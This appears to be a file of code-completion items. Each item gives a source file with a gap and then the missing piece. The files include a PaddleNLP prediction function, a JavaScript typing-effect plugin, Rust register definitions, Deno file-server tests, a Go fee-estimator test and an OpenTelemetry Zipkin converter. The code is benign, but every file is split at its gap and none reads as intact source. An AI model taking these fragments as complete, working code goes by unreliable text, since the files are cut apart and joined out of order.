# yapf: enable
def | (model, data, label_map, batch_size=1, pad_token_id=0):
"""
Predicts the data labels.
Args:
model (obj:`paddle.nn.Layer`): A model to classify texts.
data (obj:`List(Example)`): The processed data whose each element is a Example (numedtuple) object.
A Example object contains `text`(word_ids) and `se_len`(sequence length).
label_map(obj:`dict`): The label id (key) to label str (value) map.
batch_size(obj:`int`, defaults to 1): The number of batch.
pad_token_id(obj:`int`, optional, defaults to 0): The pad token index.
Returns:
results(obj:`dict`): All the predictions labels.
"""
# Seperates data into some batches.
batches = [
data[idx:idx + batch_size] for idx in range(0, len(data), batch_size)
]
batchify_fn = lambda samples, fn=Tuple(
Pad(axis=0, pad_val=pad_token_id), # input_ids
Stack(dtype="int64"), # seq len
): [data for data in fn(samples)]
results = []
model.eval()
for batch in batches:
texts, seq_lens = batchify_fn(batch)
texts = paddle.to_tensor(texts)
seq_lens = paddle.to_tensor(seq_lens)
logits = model(texts, seq_lens)
probs = F.softmax(logits, axis=1)
idx = paddle.argmax(probs, axis=1).numpy()
idx = idx.tolist()
labels = [label_map[i] for i in idx]
results.extend(labels)
return results
if __name__ == "__main__":
paddle.set_device(args.device.lower())
# Loads vocab.
vocab = Vocab.load_vocabulary(
args.vocab_path, unk_token='[UNK]', pad_token='[PAD]')
label_map = {0: 'negative', 1: 'positive'}
# Constructs the newtork.
model = ppnlp.models.Senta(
network=args.network, vocab_size=len(vocab), num_classes=len(label_map))
# Loads model parameters.
state_dict = paddle.load(args.params_path)
model.set_dict(state_dict)
print("Loaded parameters from %s" % args.params_path)
# Firstly pre-processing prediction data and then do predict.
data = [
'这个宾馆比较陈旧了,特价的房间也很一般。总体来说一般',
'怀着十分激动的心情放映,可是看着看着发现,在放映完毕后,出现一集米老鼠的动画片',
'作为老的四星酒店,房间依然很整洁,相当不错。机场接机服务很好,可以在车上办理入住手续,节省时间。',
]
tokenizer = JiebaTokenizer(vocab)
examples = preprocess_prediction_data(data, tokenizer)
results = predict(
model,
examples,
label_map=label_map,
batch_size=args.batch_size,
pad_token_id=vocab.token_to_idx.get("[PAD]", 0))
for idx, text in enumerate(data):
print('Data: {} \t Label: {}'.format(text, results[idx]))
| predict |
vanilla-tiptaptip.js | /*
* Plugin Name: Vanilla-JS Tip Tap Tip
* Version: 0.1.1
* Plugin URL: https://github.com/Darklg/JavaScriptUtilities
* JavaScriptUtilities Vanilla-JS may be freely distributed under the MIT license.
*/
var dkJSUTipTapTip = function(item, options) {
'use strict';
var self = this;
self.item = false;
self.taptext = '';
self.opt = {};
/* ----------------------------------------------------------
Init
---------------------------------------------------------- */
self.init = function(item, opt) {
if (!item) {
return false;
}
self.opt = self.getOptions(opt);
self.item = item;
self.taptext = item.getAttribute('data-taptext').split('');
};
self.getOptions = function(opt) {
var baseOptions = {
delay: 50
};
if (typeof opt != 'object') {
return baseOptions;
}
if (opt.delay && isNumber(opt.delay)) {
baseOptions.delay = parseInt(opt.delay, 10);
}
return baseOptions;
};
/* ----------------------------------------------------------
Launch
---------------------------------------------------------- */
self.launch = function() {
if (!self.item) {
return false;
}
self.interval = setInterval(self.intervalTap, self.opt.delay);
};
self.intervalTap = function() {
self.item.appendChild(document.createTextNode(self.taptext.shift()));
if (self.taptext.length <= 0) {
clearInterval(self.interval);
}
};
/* ----------------------------------------------------------
Utilities
---------------------------------------------------------- */
function | (n) {
return !isNaN(parseFloat(n)) && isFinite(n);
}
self.init(item, options);
}; | isNumber |
pc.rs | #[doc = r"Register block"]
#[repr(C)]
pub struct RegisterBlock {
_reserved0: [u8; 64usize],
#[doc = "0x40 - Port C Input"]
pub pcin: PCIN,
#[doc = "0x42 - Port C Output"]
pub pcout: PCOUT,
#[doc = "0x44 - Port C Direction"]
pub pcdir: PCDIR,
#[doc = "0x46 - Port C Resistor Enable"]
pub pcren: PCREN,
_reserved4: [u8; 2usize],
#[doc = "0x4a - Port C Select 0"]
pub pcsel0: PCSEL0,
#[doc = "0x4c - Port C Select 1"]
pub pcsel1: PCSEL1,
_reserved6: [u8; 8usize],
#[doc = "0x56 - Port C Complement Select"]
pub pcselc: PCSELC,
#[doc = "0x58 - Port C Interrupt Edge Select"]
pub pcies: PCIES,
#[doc = "0x5a - Port C Interrupt Enable"]
pub pcie: PCIE,
#[doc = "0x5c - Port C Interrupt Flag"]
pub pcifg: PCIFG,
}
#[doc = "Port C Input\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcin](pcin) module"]
pub type PCIN = crate::Reg<u16, _PCIN>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCIN;
#[doc = "`read()` method returns [pcin::R](pcin::R) reader structure"]
impl crate::Readable for PCIN {}
#[doc = "`write(|w| ..)` method takes [pcin::W](pcin::W) writer structure"]
impl crate::Writable for PCIN {}
#[doc = "Port C Input"]
pub mod pcin;
#[doc = "Port C Output\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcout](pcout) module"]
pub type PCOUT = crate::Reg<u16, _PCOUT>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCOUT;
#[doc = "`read()` method returns [pcout::R](pcout::R) reader structure"]
impl crate::Readable for PCOUT {}
#[doc = "`write(|w| ..)` method takes [pcout::W](pcout::W) writer structure"]
impl crate::Writable for PCOUT {}
#[doc = "Port C Output"]
pub mod pcout;
#[doc = "Port C Direction\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcdir](pcdir) module"]
pub type PCDIR = crate::Reg<u16, _PCDIR>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCDIR;
#[doc = "`read()` method returns [pcdir::R](pcdir::R) reader structure"]
impl crate::Readable for PCDIR {}
#[doc = "`write(|w| ..)` method takes [pcdir::W](pcdir::W) writer structure"]
impl crate::Writable for PCDIR {}
#[doc = "Port C Direction"]
pub mod pcdir;
#[doc = "Port C Resistor Enable\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcren](pcren) module"]
pub type PCREN = crate::Reg<u16, _PCREN>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCREN;
#[doc = "`read()` method returns [pcren::R](pcren::R) reader structure"]
impl crate::Readable for PCREN {}
#[doc = "`write(|w| ..)` method takes [pcren::W](pcren::W) writer structure"]
impl crate::Writable for PCREN {}
#[doc = "Port C Resistor Enable"]
pub mod pcren;
#[doc = "Port C Select 0\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcsel0](pcsel0) module"]
pub type PCSEL0 = crate::Reg<u16, _PCSEL0>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCSEL0;
#[doc = "`read()` method returns [pcsel0::R](pcsel0::R) reader structure"]
impl crate::Readable for PCSEL0 {}
#[doc = "`write(|w| ..)` method takes [pcsel0::W](pcsel0::W) writer structure"]
impl crate::Writable for PCSEL0 {}
#[doc = "Port C Select 0"]
pub mod pcsel0;
#[doc = "Port C Select 1\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcsel1](pcsel1) module"]
pub type PCSEL1 = crate::Reg<u16, _PCSEL1>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCSEL1;
#[doc = "`read()` method returns [pcsel1::R](pcsel1::R) reader structure"]
impl crate::Readable for PCSEL1 {}
#[doc = "`write(|w| ..)` method takes [pcsel1::W](pcsel1::W) writer structure"]
impl crate::Writable for PCSEL1 {}
#[doc = "Port C Select 1"]
pub mod pcsel1;
#[doc = "Port C Complement Select\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcselc](pcselc) module"]
pub type PCSELC = crate::Reg<u16, _PCSELC>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCSELC;
#[doc = "`read()` method returns [pcselc::R](pcselc::R) reader structure"]
impl crate::Readable for PCSELC {}
#[doc = "`write(|w| ..)` method takes [pcselc::W](pcselc::W) writer structure"]
impl crate::Writable for PCSELC {}
#[doc = "Port C Complement Select"]
pub mod pcselc;
#[doc = "Port C Interrupt Edge Select\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcies](pcies) module"]
pub type PCIES = crate::Reg<u16, _PCIES>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCIES;
#[doc = "`read()` method returns [pcies::R](pcies::R) reader structure"]
impl crate::Readable for PCIES {}
#[doc = "`write(|w| ..)` method takes [pcies::W](pcies::W) writer structure"]
impl crate::Writable for PCIES {}
#[doc = "Port C Interrupt Edge Select"]
pub mod pcies;
#[doc = "Port C Interrupt Enable\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcie](pcie) module"]
pub type PCIE = crate::Reg<u16, _PCIE>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCIE;
#[doc = "`read()` method returns [pcie::R](pcie::R) reader structure"]
impl crate::Readable for PCIE {}
#[doc = "`write(|w| ..)` method takes [pcie::W](pcie::W) writer structure"]
impl crate::Writable for PCIE {}
#[doc = "Port C Interrupt Enable"]
pub mod pcie;
#[doc = "Port C Interrupt Flag\n\nThis register you can [`read`](crate::generic::Reg::read), [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero), [`modify`](crate::generic::Reg::modify). See [API](https://docs.rs/svd2rust/#read--modify--write-api).\n\nFor information about available fields see [pcifg](pcifg) module"]
pub type PCIFG = crate::Reg<u16, _PCIFG>;
#[allow(missing_docs)]
#[doc(hidden)]
pub struct _PCIFG;
#[doc = "`read()` method returns [pcifg::R](pcifg::R) reader structure"]
impl crate::Readable for PCIFG {}
#[doc = "`write(|w| ..)` method takes [pcifg::W](pcifg::W) writer structure"]
| impl crate::Writable for PCIFG {}
#[doc = "Port C Interrupt Flag"]
pub mod pcifg; | |
file_server_test.ts | // Copyright 2018-2019 the Deno authors. All rights reserved. MIT license.
import { test } from "../testing/mod.ts";
import { assert, assertEquals } from "../testing/asserts.ts";
import { BufReader } from "../io/bufio.ts";
import { TextProtoReader } from "../textproto/mod.ts";
let fileServer: Deno.Process;
async function | (): Promise<void> {
fileServer = Deno.run({
args: [
Deno.execPath(),
"run",
"--allow-read",
"--allow-net",
"http/file_server.ts",
".",
"--cors"
],
stdout: "piped"
});
// Once fileServer is ready it will write to its stdout.
const r = new TextProtoReader(new BufReader(fileServer.stdout!));
const s = await r.readLine();
assert(s !== Deno.EOF && s.includes("server listening"));
}
function killFileServer(): void {
fileServer.close();
fileServer.stdout!.close();
}
test(async function serveFile(): Promise<void> {
await startFileServer();
try {
const res = await fetch("http://localhost:4500/README.md");
assert(res.headers.has("access-control-allow-origin"));
assert(res.headers.has("access-control-allow-headers"));
const downloadedFile = await res.text();
const localFile = new TextDecoder().decode(
await Deno.readFile("README.md")
);
assertEquals(downloadedFile, localFile);
} finally {
killFileServer();
}
});
test(async function serveDirectory(): Promise<void> {
await startFileServer();
try {
const res = await fetch("http://localhost:4500/");
assert(res.headers.has("access-control-allow-origin"));
assert(res.headers.has("access-control-allow-headers"));
const page = await res.text();
assert(page.includes("README.md"));
// `Deno.FileInfo` is not completely compatible with Windows yet
// TODO: `mode` should work correctly in the future.
// Correct this test case accordingly.
Deno.build.os !== "win" &&
assert(/<td class="mode">(\s)*\([a-zA-Z-]{10}\)(\s)*<\/td>/.test(page));
Deno.build.os === "win" &&
assert(/<td class="mode">(\s)*\(unknown mode\)(\s)*<\/td>/.test(page));
assert(page.includes(`<a href="/README.md">README.md</a>`));
} finally {
killFileServer();
}
});
test(async function serveFallback(): Promise<void> {
await startFileServer();
try {
const res = await fetch("http://localhost:4500/badfile.txt");
assert(res.headers.has("access-control-allow-origin"));
assert(res.headers.has("access-control-allow-headers"));
assertEquals(res.status, 404);
} finally {
killFileServer();
}
});
test(async function serveFallback(): Promise<void> {
await startFileServer();
try {
const res = await fetch(
"http://localhost:4500/http/testdata/test%20file.txt"
);
assert(res.headers.has("access-control-allow-origin"));
assert(res.headers.has("access-control-allow-headers"));
assertEquals(res.status, 200);
} finally {
killFileServer();
}
});
| startFileServer |
estimatefee_test.go | // Copyright (c) 2016 The btcsuite developers
// Copyright (c) 2018-2019 The Soteria DAG developers
// Use of this source code is governed by an ISC
// license that can be found in the LICENSE file.
package mempool
import (
"bytes"
"math/rand"
"testing"
"github.com/soteria-dag/soterd/chaincfg/chainhash"
"github.com/soteria-dag/soterd/miningdag"
"github.com/soteria-dag/soterd/soterutil"
"github.com/soteria-dag/soterd/wire"
)
// newTestFeeEstimator creates a feeEstimator with some different parameters
// for testing purposes.
func newTestFeeEstimator(binSize, maxReplacements, maxRollback uint32) *FeeEstimator {
return &FeeEstimator{
maxRollback: maxRollback,
lastKnownHeight: 0,
binSize: int32(binSize),
minRegisteredBlocks: 0,
maxReplacements: int32(maxReplacements),
observed: make(map[chainhash.Hash]*observedTransaction),
dropped: make([]*registeredBlock, 0, maxRollback),
}
}
// lastBlock is a linked list of the block hashes which have been
// processed by the test FeeEstimator.
type lastBlock struct {
hash *chainhash.Hash
prev *lastBlock
}
// estimateFeeTester interacts with the FeeEstimator to keep track
// of its expected state.
type estimateFeeTester struct {
ef *FeeEstimator
t *testing.T
version int32
height int32
last *lastBlock
}
func (eft *estimateFeeTester) testTx(fee soterutil.Amount) *TxDesc {
eft.version++
return &TxDesc{
TxDesc: miningdag.TxDesc{
Tx: soterutil.NewTx(&wire.MsgTx{
Version: eft.version,
}),
Height: eft.height,
Fee: int64(fee),
},
StartingPriority: 0,
}
}
func expectedFeePerKilobyte(t *TxDesc) SotoPerKilobyte {
size := float64(t.TxDesc.Tx.MsgTx().SerializeSize())
fee := float64(t.TxDesc.Fee)
return nanoSoterPerByte(fee / size).ToSotoPerKb()
}
func (eft *estimateFeeTester) newBlock(txs []*wire.MsgTx) {
eft.height++
block := soterutil.NewBlock(&wire.MsgBlock{
Transactions: txs,
})
block.SetHeight(eft.height)
eft.last = &lastBlock{block.Hash(), eft.last}
eft.ef.RegisterBlock(block)
}
func (eft *estimateFeeTester) rollback() {
if eft.last == nil {
return
}
err := eft.ef.Rollback(eft.last.hash)
if err != nil {
eft.t.Errorf("Could not rollback: %v", err)
}
eft.height--
eft.last = eft.last.prev
}
// TestEstimateFee tests basic functionality in the FeeEstimator.
func TestEstimateFee(t *testing.T) {
ef := newTestFeeEstimator(5, 3, 1)
eft := estimateFeeTester{ef: ef, t: t}
// Try with no txs and get zero for all queries.
expected := SotoPerKilobyte(0.0)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f when estimator is empty; got %f", expected, estimated)
}
}
// Now insert a tx.
tx := eft.testTx(1000000)
ef.ObserveTransaction(tx)
// Expected should still be zero because this is still in the mempool.
expected = SotoPerKilobyte(0.0)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f when estimator has one tx in mempool; got %f", expected, estimated)
}
}
// Change minRegisteredBlocks to make sure that works. Error return
// value expected.
ef.minRegisteredBlocks = 1
expected = SotoPerKilobyte(-1.0) |
if estimated != expected {
t.Errorf("Estimate fee error: expected %f before any blocks have been registered; got %f", expected, estimated)
}
}
// Record a block with the new tx.
eft.newBlock([]*wire.MsgTx{tx.Tx.MsgTx()})
expected = expectedFeePerKilobyte(tx)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f when one tx is binned; got %f", expected, estimated)
}
}
// Roll back the last block; this was an orphan block.
ef.minRegisteredBlocks = 0
eft.rollback()
expected = SotoPerKilobyte(0.0)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f after rolling back block; got %f", expected, estimated)
}
}
// Record an empty block and then a block with the new tx.
// This test was made because of a bug that only appeared when there
// were no transactions in the first bin.
eft.newBlock([]*wire.MsgTx{})
eft.newBlock([]*wire.MsgTx{tx.Tx.MsgTx()})
expected = expectedFeePerKilobyte(tx)
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if estimated != expected {
t.Errorf("Estimate fee error: expected %f when one tx is binned; got %f", expected, estimated)
}
}
// Create some more transactions.
txA := eft.testTx(500000)
txB := eft.testTx(2000000)
txC := eft.testTx(4000000)
ef.ObserveTransaction(txA)
ef.ObserveTransaction(txB)
ef.ObserveTransaction(txC)
// Record 7 empty blocks.
for i := 0; i < 7; i++ {
eft.newBlock([]*wire.MsgTx{})
}
// Mine the first tx.
eft.newBlock([]*wire.MsgTx{txA.Tx.MsgTx()})
// Now the estimated amount should depend on the value
// of the argument to estimate fee.
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if i > 2 {
expected = expectedFeePerKilobyte(txA)
} else {
expected = expectedFeePerKilobyte(tx)
}
if estimated != expected {
t.Errorf("Estimate fee error: expected %f on round %d; got %f", expected, i, estimated)
}
}
// Record 5 more empty blocks.
for i := 0; i < 5; i++ {
eft.newBlock([]*wire.MsgTx{})
}
// Mine the next tx.
eft.newBlock([]*wire.MsgTx{txB.Tx.MsgTx()})
// Now the estimated amount should depend on the value
// of the argument to estimate fee.
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if i <= 2 {
expected = expectedFeePerKilobyte(txB)
} else if i <= 8 {
expected = expectedFeePerKilobyte(tx)
} else {
expected = expectedFeePerKilobyte(txA)
}
if estimated != expected {
t.Errorf("Estimate fee error: expected %f on round %d; got %f", expected, i, estimated)
}
}
// Record 9 more empty blocks.
for i := 0; i < 10; i++ {
eft.newBlock([]*wire.MsgTx{})
}
// Mine txC.
eft.newBlock([]*wire.MsgTx{txC.Tx.MsgTx()})
// This should have no effect on the outcome because too
// many blocks have been mined for txC to be recorded.
for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i)
if i <= 2 {
expected = expectedFeePerKilobyte(txC)
} else if i <= 8 {
expected = expectedFeePerKilobyte(txB)
} else if i <= 8+6 {
expected = expectedFeePerKilobyte(tx)
} else {
expected = expectedFeePerKilobyte(txA)
}
if estimated != expected {
t.Errorf("Estimate fee error: expected %f on round %d; got %f", expected, i, estimated)
}
}
}
func (eft *estimateFeeTester) estimates() [estimateFeeDepth]SotoPerKilobyte {
// Generate estimates
var estimates [estimateFeeDepth]SotoPerKilobyte
for i := 0; i < estimateFeeDepth; i++ {
estimates[i], _ = eft.ef.EstimateFee(uint32(i + 1))
}
// Check that all estimated fee results go in descending order.
for i := 1; i < estimateFeeDepth; i++ {
if estimates[i] > estimates[i-1] {
eft.t.Error("Estimates not in descending order; got ",
estimates[i], " for estimate ", i, " and ", estimates[i-1], " for ", (i - 1))
panic("invalid state.")
}
}
return estimates
}
func (eft *estimateFeeTester) round(txHistory [][]*TxDesc,
estimateHistory [][estimateFeeDepth]SotoPerKilobyte,
txPerRound, txPerBlock uint32) ([][]*TxDesc, [][estimateFeeDepth]SotoPerKilobyte) {
// generate new txs.
var newTxs []*TxDesc
for i := uint32(0); i < txPerRound; i++ {
newTx := eft.testTx(soterutil.Amount(rand.Intn(1000000)))
eft.ef.ObserveTransaction(newTx)
newTxs = append(newTxs, newTx)
}
// Generate mempool.
mempool := make(map[*observedTransaction]*TxDesc)
for _, h := range txHistory {
for _, t := range h {
if o, exists := eft.ef.observed[*t.Tx.Hash()]; exists && o.mined == miningdag.UnminedHeight {
mempool[o] = t
}
}
}
// generate new block, with no duplicates.
i := uint32(0)
newBlockList := make([]*wire.MsgTx, 0, txPerBlock)
for _, t := range mempool {
newBlockList = append(newBlockList, t.TxDesc.Tx.MsgTx())
i++
if i == txPerBlock {
break
}
}
// Register a new block.
eft.newBlock(newBlockList)
// return results.
estimates := eft.estimates()
// Return results
return append(txHistory, newTxs), append(estimateHistory, estimates)
}
// TestEstimateFeeRollback tests the rollback function, which undoes the
// effect of a adding a new block.
func TestEstimateFeeRollback(t *testing.T) {
txPerRound := uint32(7)
txPerBlock := uint32(5)
binSize := uint32(6)
maxReplacements := uint32(4)
stepsBack := 2
rounds := 30
eft := estimateFeeTester{ef: newTestFeeEstimator(binSize, maxReplacements, uint32(stepsBack)), t: t}
var txHistory [][]*TxDesc
estimateHistory := [][estimateFeeDepth]SotoPerKilobyte{eft.estimates()}
for round := 0; round < rounds; round++ {
// Go forward a few rounds.
for step := 0; step <= stepsBack; step++ {
txHistory, estimateHistory =
eft.round(txHistory, estimateHistory, txPerRound, txPerBlock)
}
// Now go back.
for step := 0; step < stepsBack; step++ {
eft.rollback()
// After rolling back, we should have the same estimated
// fees as before.
expected := estimateHistory[len(estimateHistory)-step-2]
estimates := eft.estimates()
// Ensure that these are both the same.
for i := 0; i < estimateFeeDepth; i++ {
if expected[i] != estimates[i] {
t.Errorf("Rollback value mismatch. Expected %f, got %f. ",
expected[i], estimates[i])
return
}
}
}
// Erase history.
txHistory = txHistory[0 : len(txHistory)-stepsBack]
estimateHistory = estimateHistory[0 : len(estimateHistory)-stepsBack]
}
}
func (eft *estimateFeeTester) checkSaveAndRestore(
previousEstimates [estimateFeeDepth]SotoPerKilobyte) {
// Get the save state.
save := eft.ef.Save()
// Save and restore database.
var err error
eft.ef, err = RestoreFeeEstimator(save)
if err != nil {
eft.t.Fatalf("Could not restore database: %s", err)
}
// Save again and check that it matches the previous one.
redo := eft.ef.Save()
if !bytes.Equal(save, redo) {
eft.t.Fatalf("Restored states do not match: %v %v", save, redo)
}
// Check that the results match.
newEstimates := eft.estimates()
for i, prev := range previousEstimates {
if prev != newEstimates[i] {
eft.t.Error("Mismatch in estimate ", i, " after restore; got ", newEstimates[i], " but expected ", prev)
}
}
}
// TestSave tests saving and restoring to a []byte.
func TestDatabase(t *testing.T) {
txPerRound := uint32(7)
txPerBlock := uint32(5)
binSize := uint32(6)
maxReplacements := uint32(4)
rounds := 8
eft := estimateFeeTester{ef: newTestFeeEstimator(binSize, maxReplacements, uint32(rounds)+1), t: t}
var txHistory [][]*TxDesc
estimateHistory := [][estimateFeeDepth]SotoPerKilobyte{eft.estimates()}
for round := 0; round < rounds; round++ {
eft.checkSaveAndRestore(estimateHistory[len(estimateHistory)-1])
// Go forward one step.
txHistory, estimateHistory =
eft.round(txHistory, estimateHistory, txPerRound, txPerBlock)
}
// Reverse the process and try again.
for round := 1; round <= rounds; round++ {
eft.rollback()
eft.checkSaveAndRestore(estimateHistory[len(estimateHistory)-round-1])
}
} | for i := uint32(1); i <= estimateFeeDepth; i++ {
estimated, _ := ef.EstimateFee(i) |
model.go | // Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package zipkin // import "go.opentelemetry.io/otel/exporters/zipkin"
import (
"encoding/binary"
"encoding/json"
"fmt"
"net"
"strconv"
zkmodel "github.com/openzipkin/zipkin-go/model"
"go.opentelemetry.io/otel/attribute"
"go.opentelemetry.io/otel/codes"
"go.opentelemetry.io/otel/sdk/resource"
tracesdk "go.opentelemetry.io/otel/sdk/trace"
semconv "go.opentelemetry.io/otel/semconv/v1.10.0"
"go.opentelemetry.io/otel/trace"
)
const (
keyInstrumentationLibraryName = "otel.library.name"
keyInstrumentationLibraryVersion = "otel.library.version"
keyPeerHostname attribute.Key = "peer.hostname"
keyPeerAddress attribute.Key = "peer.address"
)
var defaultServiceName string
func init() {
// fetch service.name from default resource for backup
defaultResource := resource.Default()
if value, exists := defaultResource.Set().Value(semconv.ServiceNameKey); exists {
defaultServiceName = value.AsString()
}
}
// SpanModels converts OpenTelemetry spans into Zipkin model spans.
// This is used for exporting to Zipkin compatible tracing services.
func SpanModels(batch []tracesdk.ReadOnlySpan) []zkmodel.SpanModel {
models := make([]zkmodel.SpanModel, 0, len(batch))
for _, data := range batch {
models = append(models, toZipkinSpanModel(data))
}
return models
}
func getServiceName(attrs []attribute.KeyValue) string {
for _, kv := range attrs {
if kv.Key == semconv.ServiceNameKey {
return kv.Value.AsString()
}
}
return defaultServiceName
}
func toZipkinSpanModel(data tracesdk.ReadOnlySpan) zkmodel.SpanModel {
return zkmodel.SpanModel{
SpanContext: toZipkinSpanContext(data),
Name: data.Name(),
Kind: toZipkinKind(data.SpanKind()),
Timestamp: data.StartTime(),
Duration: data.EndTime().Sub(data.StartTime()),
Shared: false,
LocalEndpoint: &zkmodel.Endpoint{
ServiceName: getServiceName(data.Resource().Attributes()),
},
RemoteEndpoint: toZipkinRemoteEndpoint(data),
Annotations: toZipkinAnnotations(data.Events()),
Tags: toZipkinTags(data),
}
}
func toZipkinSpanContext(data tracesdk.ReadOnlySpan) zkmodel.SpanContext {
return zkmodel.SpanContext{
TraceID: toZipkinTraceID(data.SpanContext().TraceID()),
ID: toZipkinID(data.SpanContext().SpanID()),
ParentID: toZipkinParentID(data.Parent().SpanID()),
Debug: false,
Sampled: nil,
Err: nil,
}
}
func toZipkinTraceID(traceID trace.TraceID) zkmodel.TraceID {
return zkmodel.TraceID{
High: binary.BigEndian.Uint64(traceID[:8]),
Low: binary.BigEndian.Uint64(traceID[8:]),
}
}
func toZipkinID(spanID trace.SpanID) zkmodel.ID {
return zkmodel.ID(binary.BigEndian.Uint64(spanID[:]))
}
func toZipkinParentID(spanID trace.SpanID) *zkmodel.ID {
if spanID.IsValid() {
id := toZipkinID(spanID)
return &id
}
return nil
}
func toZipkinKind(kind trace.SpanKind) zkmodel.Kind {
switch kind {
case trace.SpanKindUnspecified:
return zkmodel.Undetermined
case trace.SpanKindInternal:
// The spec says we should set the kind to nil, but
// the model does not allow that.
return zkmodel.Undetermined
case trace.SpanKindServer:
return zkmodel.Server
case trace.SpanKindClient:
return zkmodel.Client
case trace.SpanKindProducer:
return zkmodel.Producer
case trace.SpanKindConsumer:
return zkmodel.Consumer
}
return zkmodel.Undetermined
}
func toZipkinAnnotations(events []tracesdk.Event) []zkmodel.Annotation {
if len(events) == 0 {
return nil
}
annotations := make([]zkmodel.Annotation, 0, len(events))
for _, event := range events {
value := event.Name
if len(event.Attributes) > 0 {
jsonString := attributesToJSONMapString(event.Attributes)
if jsonString != "" {
value = fmt.Sprintf("%s: %s", event.Name, jsonString)
}
}
annotations = append(annotations, zkmodel.Annotation{
Timestamp: event.Time,
Value: value,
})
}
return annotations
}
func attributesToJSONMapString(attributes []attribute.KeyValue) string {
m := make(map[string]interface{}, len(attributes))
for _, a := range attributes {
m[(string)(a.Key)] = a.Value.AsInterface()
}
// if an error happens, the result will be an empty string
jsonBytes, _ := json.Marshal(m)
return (string)(jsonBytes)
}
// attributeToStringPair serializes each attribute to a string pair.
func attributeToStringPair(kv attribute.KeyValue) (string, string) {
switch kv.Value.Type() {
// For slice attributes, serialize as JSON list string. | data, _ := json.Marshal(kv.Value.AsInt64Slice())
return (string)(kv.Key), (string)(data)
case attribute.FLOAT64SLICE:
data, _ := json.Marshal(kv.Value.AsFloat64Slice())
return (string)(kv.Key), (string)(data)
case attribute.STRINGSLICE:
data, _ := json.Marshal(kv.Value.AsStringSlice())
return (string)(kv.Key), (string)(data)
default:
return (string)(kv.Key), kv.Value.Emit()
}
}
// extraZipkinTags are those that may be added to every outgoing span.
var extraZipkinTags = []string{
"otel.status_code",
keyInstrumentationLibraryName,
keyInstrumentationLibraryVersion,
}
